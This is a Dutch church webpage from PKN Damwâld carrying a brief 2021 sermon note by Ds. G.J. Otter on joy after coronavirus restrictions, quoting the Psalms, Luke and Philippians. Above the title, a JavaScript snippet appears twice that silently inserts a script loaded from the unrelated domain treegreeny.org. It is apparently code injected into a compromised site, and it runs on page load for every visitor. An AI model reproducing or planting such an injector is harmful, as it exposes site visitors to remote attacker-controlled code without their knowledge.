;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wat bin ik bliid dat... - PKN Damwâld

Wat bin ik bliid dat…

Gepubliceerd op: vrijdag 10 september 2021

Zo is het thema van de feestdienst deze zondag. Al zijn alle coronamaatregelen nog niet voorbij, toch zijn we erg dankbaar dat we het kerkelijk leven weer kunnen oppakken. Op heel wat plekken in de Bijbel wordt gesproken over blijdschap. In Psalm 16 vers 11 bijvoorbeeld: “U wijst mij de weg naar het leven: overvloedige vreugde in Uw nabijheid, voor altijd een lieflijke plek aan Uw zijde”. In de kerstnacht kondigt de engel het aan: “Wees niet bevreesd, want zie, ik verkondig u grote blijdschap, die voor heel het volk wezen zal, namelijk dat heden voor u geboren is de Zaligmaker…” (Lucas 2 vers 10). En Paulus roept op: “Verblijdt u in de Here te allen tijde! Wederom zal ik zeggen: Verblijdt u! Uw vriendelijkheid zij alle mensen bekend. De Here is nabij. Weest in geen ding bezorgd, maar laten bij alles uw wensen door gebed en smeking met dankzegging bekend worden bij God” (Fil.4: 4-6). Laten we blij zijn over de Here, Die naar ons omziet en Zijn redding biedt. De gevaren zijn nog niet geweken en er is nog veel onzekerheid, toch rust ons leven in Gods hand.

Ds. G.J. Otter